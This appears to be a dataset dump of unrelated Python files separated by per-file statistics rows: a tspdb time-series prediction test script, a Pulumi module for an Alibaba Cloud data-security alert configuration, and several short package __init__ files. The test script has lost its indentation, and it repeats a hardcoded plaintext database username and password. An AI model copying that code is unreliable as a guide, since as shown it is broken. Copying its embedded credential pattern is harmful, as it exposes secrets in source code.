TSPD = TSPI(_dir = 'C:/Program Files/PostgreSQL/10/data/', agg_interval = 5, T = T,T_var = T, rank = k, rank_var = k_var, col_to_row_ratio = 10, index_name = index_name,gamma = gamma, interface= interface ,time_series_table = time_series_table, direct_var = direct_var )
TSPD.create_index()
interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test",user="aalomar",password="AAmit32lids")
for points in update_points:
df = pd.DataFrame(data = {'ts':np.arange(init_points,points+init_points).astype('float')} )
timestamps = pd.date_range(end, periods = points+1, freq='5s')
end = timestamps[-1]
df.index = timestamps[:-1]
interface.bulk_insert('ts_basic_ts', df, index_label='timestamp')
init_points += points
print ('successfully updated %s points' %points)
# start = pd.to_datetime('2015-01-01 00:00:00')
# end = pd.to_datetime('2018-01-01 00:00:00')
# df = pd.DataFrame(data ={'ts': np.arange(init_points).astype('float')})
# timestamps= pd.DatetimeIndex(1000000000.*(np.random.randint(start.value/10**9,end.value/10**9, init_points)))
# df.index = np.sort(timestamps)
# interface.create_table('ts_basic_ts2', df, 'timestamp', index_label='timestamp')
def create_pindex_test(table_name, T,T_var, k ,k_var, direct_var, index_name = None , agg_interval = 1., col_to_row_ratio= 10, time_column = 'row_id'):
interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test",user="aalomar",password="AAmit32lids")
time_series_table = [table_name,'ts', time_column]
T0 = 1000
gamma = 0.5
TSPD = TSPI(T = T,T_var = T, rank = k, rank_var = k_var,agg_interval=agg_interval, col_to_row_ratio = col_to_row_ratio, index_name = index_name,gamma = gamma, interface= interface ,time_series_table = time_series_table, direct_var = direct_var )
TSPD.create_index()
print(TSPD.ts_model._denoiseTS()[-10:], TSPD.ts_model.TimeSeriesIndex)
def range_prediction_queries_test(index_name, table_name, max_):
T1 = [0,0,max_-10, max_-15000, max_] + list((max_+1000) * np.random.random(10))
T2 = [10, 10**5, max_-1, max_, max_ +10] + list((max_+1000) * np.random.random(10))
T1 = np.array(T1).astype(int)
T2 = np.array(T2).astype(int)
for t1_,t2_ in zip(T1,T2):
t1,t2 = sorted([t1_,t2_])
# print (')
# try:
get_prediction_range(index_name, table_name, 'ts', 'row_id', interface, int(t1),int(t2), uq = True)
# except: print('failure to query range between %s and %s' % (t1,t2))
def prediction_queries_test(index_name, table_name, max_):
T1 = [0,max_-10, max_-1000, max_+1, max_+10] + list((max_+1000) * np.random.random(50))
T1 = np.array(T1).astype(int)
for t1 in T1:
# try:
get_prediction(index_name, table_name, 'ts', 'row_id', interface, int(t1), uq = True)
# except: print('failure to query point %s' %t1)
def prediction_queries_accuracy_test(max_, index_name = "tspdb.ts_basic2_pindex2", table_name = "ts_basic2"):
T1 = [100000,max_-1000, max_] + list((max_-1) * np.random.random(100))
T1 = np.array(T1).astype(int)
for t1 in T1:
print ('t = '+str(t1))
A,_ = get_prediction(index_name, table_name, 'ts', 'row_id', interface, int(t1))
print (t1,A )
assert abs(A - t1) < 1e-3
def range_prediction_queries_accuracy_test(max_, index_name = "tspdb.ts_basic2_pindex2", table_name = "ts_basic2"):
T1 = [0,0,max_-10, max_-1000] + list((max_-1) * np.random.random(10))
T2 = [10, max_, max_-1, max_] + list((max_-1) * np.random.random(10))
T1 = np.array(T1).astype(int)
T2 = np.array(T2).astype(int)
for t1_,t2_ in zip(T1,T2):
t1,t2 = sorted([t1_,t2_])
A,_ = get_prediction_range(index_name, table_name, 'ts', 'row_id', interface, int(t1),int(t2), uq = True)
print (t1,t2,np.max(A - np.arange(t1,t2+1)))
print(A)
assert abs(np.max(A - np.arange(t1,t2+1))) < 1e-3
def prediction_queries_latency_test():
setup = '''import numpy as np
from tspdb.src.database_module.sql_imp import SqlImplementation
from tspdb.src.pindex.predict import get_prediction_range, get_prediction
interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test",user="aalomar",password="AAmit32lids")
'''
stmt1 = "get_prediction('tspdb.ts_5_pindex', 'ts_5', 'ts', 'row_id', interface, 10,False)"
stmt2 = "get_prediction('tspdb.ts_basic2_pindex', 'ts_basic2', 'ts', 'row_id', interface, 10,False)"
stmt3 = "get_prediction('tspdb.ts_5_pindex_2', 'ts_5', 'ts', 'row_id', interface, 10,False)"
stmtA = '''interface.execute_query("select ts from ts_basic2 where row_id = 10") '''
stmtB = '''interface.execute_query("select ts from ts_5 where row_id = 390") '''
print ('(test1 pindex: ts_5_pindex ) imp query latency is %s that of SELECT ' %(timeit.timeit(setup = setup,stmt= stmt1, number =1000)/timeit.timeit(setup = setup,stmt= stmtB, number =1000)))
print ('(test2 pindex: ts_basic2_pindex ) imp query latency is %s that of SELECT ' %(timeit.timeit(setup = setup,stmt= stmt2, number =1000)/timeit.timeit(setup = setup,stmt= stmtA, number =1000)))
print ('(test3 pindex: ts_5_pindex_2 ) imp query latency is %s that of SELECT ' %(timeit.timeit(setup = setup,stmt= stmt3, number =1000)/timeit.timeit(setup = setup,stmt= stmtB, number =1000)))
stmt1 = "get_prediction('tspdb.ts_5_pindex', 'ts_5', 'ts', 'row_id', interface, 99997 ,False)"
stmt2 = "get_prediction('tspdb.ts_basic2_pindex', 'ts_basic2', 'ts', 'row_id', interface, 999824 ,False)"
stmt3 = "get_prediction('tspdb.ts_5_pindex_2', 'ts_5', 'ts', 'row_id', interface, 99970 ,False)"
print ('(test1 pindex: ts_5_pindex ) Forecast query latency is %s that of SELECT ' %(timeit.timeit(setup = setup,stmt= stmt1, number =1000)/timeit.timeit(setup = setup,stmt= stmtB, number =1000)))
print ('(test2 pindex: ts_basic2_pindex ) Forecast query latency is %s that of SELECT ' %(timeit.timeit(setup = setup,stmt= stmt2, number =1000)/timeit.timeit(setup = setup,stmt= stmtA, number =1000)))
print ('(test3 pindex: ts_5_pindex_2 ) Forecast query latency is %s that of SELECT ' %(timeit.timeit(setup = setup,stmt= stmt3, number =1000)/timeit.timeit(setup = setup,stmt= stmtB, number =1000)))
def main():
# ts_table_tests()
# print('test 1')
update_test()
print('test 2')
update_test(init_points = 10**4 , update_points = [10**4, 100,1,100000,10002], T = 10000, index_name = 'haha')
# print('test 3')
# update_test(init_points = 10**4 , update_points = [10**4], T = 1000000, index_name = 'hahddda')
# print('test 4')
# update_test(init_points = 10**4 , T = 1000000, direct_var = False, index_name = 'hahaeee')
# t2 = time.time()
# create_pindex_test('ts_basic2', 250000,250000, 2 ,1, True, index_name = 'ts_basic2_pindex', time_column = 'row_id',agg_interval = 1 )
# print ('create pindex test: basic test, time = %s seconds, %s record/s'%(time.time()-t2, (time.time()-t2)/10**6))
# print('=======================================================')
# print('SUCCESS')
# print('=======================================================')
# t2 = time.time()
# create_pindex_test('ts_basic2', 30000,30000, 2 ,1, True, index_name = 'ts_basic2_pindex2', time_column = 'row_id',agg_interval = 1 )
# print ('create pindex test: basic test T = 10000, time = %s seconds, %s record/s'%(time.time()-t2, (time.time()-t2)/10**6))
# print('=======================================================')
# print('SUCCESS')
# print('=======================================================')
# t2 = time.time()
# create_pindex_test('ts_5', 9240,9240, 2 ,1, True, index_name = 'ts_5_pindex' )
# print ('create pindex test: T = 9240, time = %s seconds, %s record/s' %(time.time()-t2, (time.time()-t2)/10**5))
# print('=======================================================')
# print('SUCCESS')
# print('=======================================================')
# t2 = time.time()
# create_pindex_test('ts_5', 10000,10000, 2 ,1, False, index_name = 'ts_5_pindex_2' , col_to_row_ratio = 1)
# print ('create pindex test: non-direct_var, time = %s seconds, %s record/s'%(time.time()-t2, (time.time()-t2)/10**5))
# print('testing 15 range queries in index ts_basic2_pindex')
# range_prediction_queries_test('tspdb.ts_basic2_pindex', 'ts_basic2', 10**6)
# print('=======================================================')
# print('SUCCESS')
# print('=======================================================')
# print('testing 50 point queries in index ts_basic2_pindex')
# prediction_queries_test('tspdb.ts_basic2_pindex', 'ts_basic2', 10**6)
# print('=======================================================')
# print('SUCCESS')
# print('=======================================================')
# print('testing 15 range queries in index ts_basic2_pindex2')
# range_prediction_queries_test('tspdb.ts_basic2_pindex2', 'ts_basic2', 10**6)
# print('=======================================================')
# print('SUCCESS')
# print('=======================================================')
# print('testing 50 point queries in index ts_basic2_pindex2')
# prediction_queries_test('tspdb.ts_basic2_pindex2', 'ts_basic2', 10**6)
# print('=======================================================')
# print('SUCCESS')
# print('=======================================================')
# print('testing 15 range queries in index ts_5_pindex')
# range_prediction_queries_test('tspdb.ts_5_pindex', 'ts_5', 10**5)
# print('=======================================================')
# print('SUCCESS')
# print('=======================================================')
# print('testing 50 point queries in index ts_5_pindex')
# prediction_queries_test('tspdb.ts_5_pindex', 'ts_5', 10**5)
# print('=======================================================')
# print('SUCCESS')
# print('=======================================================')
# print('testing 15 range queries in index ts_5_pindex_2')
# range_prediction_queries_test('tspdb.ts_5_pindex_2', 'ts_5', 10**5)
# print('=======================================================')
# print('SUCCESS')
# print('=======================================================')
# print('testing 50 point queries in index ts_5_pindex_2')
# prediction_queries_test('tspdb.ts_5_pindex_2', 'ts_5', 10**5)
# print('=======================================================')
# print('SUCCESS')
# prediction_queries_latency_test()
# print('=======================================================')
# print('Imputation accuracy Test')
# range_prediction_queries_accuracy_test(999824)
# prediction_queries_accuracy_test(999824)
# print('=======================================================')
# print('SUCCESS')
main()
# max_ = 99995
# T1 = (max_ * np.random.random(100)).astype(int)
# T2 = (max_ * np.random.random(100)).astype(int)
# for t1_,t2_ in zip(T1,T2):
# t1,t2 = sorted([t1_,t2_])
# print(get_prediction_range('ts_5_pindex', 'ts_5', 'ts', 'row_id', interface, int(t1),int(t2), uq = False))
# get_prediction_range('ts_5_pindex', 'ts_5', 'ts', 'row_id', interface, 1,6, uq = False)
# stmt1 = "get_prediction_range('ts_5_pindex', 'ts_basic2', 'ts', 'row_id', interface, 10,0)"
# timeit.timeit(setup = setup,stmt= stmt1, number =1000)
# stmt = '''interface.engine.execute("select prediction from predict('ts_basic2', 'ts', 'row_id', 10, c=>95, uq => false);")'''
# timeit.timeit(setup = setup,stmt= stmt, number =1000)
# stmt2 = '''interface.engine.execute("select ts from ts_basic2 where row_id = 10") '''
# timeit.timeit(setup = setup,stmt= stmt2, number =1000)
# timeit.timeit(setup = setup,stmt= stmt, number =1000)/timeit.timeit(setup = setup,stmt= stmt2, number =1000)
# stmt = '''interface.engine.execute("select prediction from predict('ts_basic2', 'ts', 'row_id', 1000000, c=>95, uq => false);")'''
# timeit.timeit(setup = setup,stmt= stmt, number =1000)
# timeit.timeit(setup = setup,stmt= stmt, number =1000)/timeit.timeit(setup = setup,stmt= stmt2, number =1000)
# stmt = '''interface.engine.execute("select prediction from predict('ts_basic2', 'ts', 'row_id', 1000000, c=>95, uq => true);")'''
# timeit.timeit(setup = setup,stmt= stmt, number =1000)
# timeit.timeit(setup = setup,stmt= stmt, number =1000)/timeit.timeit(setup = setup,stmt= stmt2, number =1000)
# stmt = '''interface.engine.execute("select prediction from predict('ts_basic2', 'ts', 'row_id', 10, c=>95, uq => true);")'''
# timeit.timeit(setup = setup,stmt= stmt, number =1000)
# timeit.timeit(setup = setup,stmt= stmt, number =1000)/timeit.timeit(setup = setup,stmt= stmt2, number =1000)
# coeff = [i[0] for i in interface.engine.execute('select coeffvalue from ts_5_pindex_c where modelno = 1 order by coeffpos;').fetchall()]
# t = 100000
# ouput = [i[0] for i in interface.engine.execute('select ts from ts_5 where row_id<= 100000-30;').fetchall()]
| 54.227586 | 273 | 0.630993 | 2,164 | 15,726 | 4.366451 | 0.09427 | 0.01143 | 0.046777 | 0.060536 | 0.848555 | 0.79437 | 0.781141 | 0.741454 | 0.710551 | 0.679225 | 0 | 0.059812 | 0.133537 | 15,726 | 289 | 274 | 54.415225 | 0.633642 | 0.440926 | 0 | 0.438596 | 0 | 0.061404 | 0.259454 | 0.06704 | 0 | 0 | 0 | 0 | 0.017544 | 1 | 0.078947 | false | 0.061404 | 0.096491 | 0 | 0.175439 | 0.122807 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
0ba7f469837164e24372f455e636e03038a64d6e | 15,854 | py | Python | sdk/python/pulumi_alicloud/sddp/config.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/sddp/config.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/sddp/config.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ConfigArgs', 'Config']
@pulumi.input_type
class ConfigArgs:
def __init__(__self__, *,
code: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
lang: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Config resource.
:param pulumi.Input[str] code: Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
:param pulumi.Input[str] description: Abnormal Alarm General Description of the Configuration Item.
:param pulumi.Input[str] value: The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
* `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
* `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
* `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
"""
if code is not None:
pulumi.set(__self__, "code", code)
if description is not None:
pulumi.set(__self__, "description", description)
if lang is not None:
pulumi.set(__self__, "lang", lang)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def code(self) -> Optional[pulumi.Input[str]]:
"""
Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
"""
return pulumi.get(self, "code")
@code.setter
def code(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "code", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Abnormal Alarm General Description of the Configuration Item.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def lang(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "lang")
@lang.setter
def lang(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lang", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
* `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
* `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
* `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class _ConfigState:
def __init__(__self__, *,
code: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
lang: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Config resources.
:param pulumi.Input[str] code: Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
:param pulumi.Input[str] description: Abnormal Alarm General Description of the Configuration Item.
:param pulumi.Input[str] value: The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
* `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
* `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
* `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
"""
if code is not None:
pulumi.set(__self__, "code", code)
if description is not None:
pulumi.set(__self__, "description", description)
if lang is not None:
pulumi.set(__self__, "lang", lang)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def code(self) -> Optional[pulumi.Input[str]]:
"""
Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
"""
return pulumi.get(self, "code")
@code.setter
def code(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "code", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Abnormal Alarm General Description of the Configuration Item.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def lang(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "lang")
@lang.setter
def lang(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lang", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
* `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
* `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
* `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
class Config(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
code: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
lang: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Data Security Center Config resource.
For information about Data Security Center Config and how to use it, see [What is Config](https://help.aliyun.com/product/88674.html).
> **NOTE:** Available in v1.133.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default = alicloud.sddp.Config("default",
code="access_failed_cnt",
value="10")
```
## Import
Data Security Center Config can be imported using the id, e.g.
```sh
$ pulumi import alicloud:sddp/config:Config example <code>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] code: Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
:param pulumi.Input[str] description: Abnormal Alarm General Description of the Configuration Item.
:param pulumi.Input[str] value: The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
* `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
* `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
* `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[ConfigArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Data Security Center Config resource.
For information about Data Security Center Config and how to use it, see [What is Config](https://help.aliyun.com/product/88674.html).
> **NOTE:** Available in v1.133.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default = alicloud.sddp.Config("default",
code="access_failed_cnt",
value="10")
```
## Import
Data Security Center Config can be imported using the id, e.g.
```sh
$ pulumi import alicloud:sddp/config:Config example <code>
```
:param str resource_name: The name of the resource.
:param ConfigArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ConfigArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
code: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
lang: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ConfigArgs.__new__(ConfigArgs)
__props__.__dict__["code"] = code
__props__.__dict__["description"] = description
__props__.__dict__["lang"] = lang
__props__.__dict__["value"] = value
super(Config, __self__).__init__(
'alicloud:sddp/config:Config',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
code: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
lang: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None) -> 'Config':
"""
Get an existing Config resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] code: Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
:param pulumi.Input[str] description: Abnormal Alarm General Description of the Configuration Item.
:param pulumi.Input[str] value: The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
* `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
* `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
* `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ConfigState.__new__(_ConfigState)
__props__.__dict__["code"] = code
__props__.__dict__["description"] = description
__props__.__dict__["lang"] = lang
__props__.__dict__["value"] = value
return Config(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def code(self) -> pulumi.Output[Optional[str]]:
"""
Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
"""
return pulumi.get(self, "code")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
Abnormal Alarm General Description of the Configuration Item.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def lang(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "lang")
@property
@pulumi.getter
def value(self) -> pulumi.Output[Optional[str]]:
"""
The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
* `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
* `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
* `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
"""
return pulumi.get(self, "value")
| 45.688761 | 202 | 0.660969 | 1,884 | 15,854 | 5.364119 | 0.105626 | 0.0566 | 0.069266 | 0.078369 | 0.855136 | 0.835444 | 0.81981 | 0.811993 | 0.806946 | 0.806946 | 0 | 0.003281 | 0.250284 | 15,854 | 346 | 203 | 45.820809 | 0.846963 | 0.484168 | 0 | 0.745665 | 1 | 0 | 0.058127 | 0.003719 | 0 | 0 | 0 | 0 | 0 | 1 | 0.156069 | false | 0.00578 | 0.028902 | 0.017341 | 0.277457 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e7e3022441510476c354d59e76340450bc6d43ed | 183 | py | Python | panstamps/__init__.py | djones1040/panstamps | b9e67b4dc168846ddb36e4b5f143c136660a0535 | [
"MIT"
] | null | null | null | panstamps/__init__.py | djones1040/panstamps | b9e67b4dc168846ddb36e4b5f143c136660a0535 | [
"MIT"
] | null | null | null | panstamps/__init__.py | djones1040/panstamps | b9e67b4dc168846ddb36e4b5f143c136660a0535 | [
"MIT"
] | null | null | null | from panstamps.__version__ import __version__
from panstamps import utKit
from panstamps import cl_utils
from panstamps.downloader import downloader
from panstamps.image import image
| 30.5 | 45 | 0.874317 | 24 | 183 | 6.291667 | 0.375 | 0.430464 | 0.251656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10929 | 183 | 5 | 46 | 36.6 | 0.92638 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f009da930b3b0287dc0e71e2fc799cd642d7160e | 1,065 | py | Python | env/lib/python3.6/site-packages/alembic/testing/__init__.py | amogh-gulati/corona_dashboard | ce1a20ad56bdfb758d41513b4706fe3a47764c32 | [
"MIT"
] | 25 | 2020-10-03T07:18:44.000Z | 2022-03-24T06:22:19.000Z | env/lib/python3.6/site-packages/alembic/testing/__init__.py | amogh-gulati/corona_dashboard | ce1a20ad56bdfb758d41513b4706fe3a47764c32 | [
"MIT"
] | 33 | 2020-04-14T22:09:04.000Z | 2021-01-10T02:58:49.000Z | env/lib/python3.6/site-packages/alembic/testing/__init__.py | amogh-gulati/corona_dashboard | ce1a20ad56bdfb758d41513b4706fe3a47764c32 | [
"MIT"
] | 20 | 2020-10-03T09:49:24.000Z | 2021-11-25T08:48:30.000Z | from sqlalchemy.testing import config # noqa
from sqlalchemy.testing import emits_warning # noqa
from sqlalchemy.testing import engines # noqa
from sqlalchemy.testing import mock # noqa
from sqlalchemy.testing import provide_metadata # noqa
from sqlalchemy.testing import uses_deprecated # noqa
from sqlalchemy.testing.config import requirements as requires # noqa
from alembic import util # noqa
from . import exclusions # noqa
from .assertions import assert_raises # noqa
from .assertions import assert_raises_message # noqa
from .assertions import emits_python_deprecation_warning # noqa
from .assertions import eq_ # noqa
from .assertions import eq_ignore_whitespace # noqa
from .assertions import is_ # noqa
from .assertions import is_false # noqa
from .assertions import is_not_ # noqa
from .assertions import is_true # noqa
from .assertions import ne_ # noqa
from .fixture_functions import combinations # noqa
from .fixture_functions import fixture # noqa
from .fixtures import TestBase # noqa
from .util import resolve_lambda # noqa
| 42.6 | 70 | 0.802817 | 141 | 1,065 | 5.914894 | 0.29078 | 0.211031 | 0.215827 | 0.28777 | 0.531175 | 0.086331 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153991 | 1,065 | 24 | 71 | 44.375 | 0.925638 | 0.107042 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.434783 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f016c53efb4cd76a9653aa250160f22268f54137 | 135 | py | Python | cogs/__init__.py | Shlol762/CauveryBot | e7ca4a289f6c661e53133249b630a64a81a7a9d7 | [
"MIT"
] | null | null | null | cogs/__init__.py | Shlol762/CauveryBot | e7ca4a289f6c661e53133249b630a64a81a7a9d7 | [
"MIT"
] | null | null | null | cogs/__init__.py | Shlol762/CauveryBot | e7ca4a289f6c661e53133249b630a64a81a7a9d7 | [
"MIT"
] | null | null | null | from utils import *
from discord import *
from discord.ext.commands import *
from discord.ext.tasks import *
from discord.ui import *
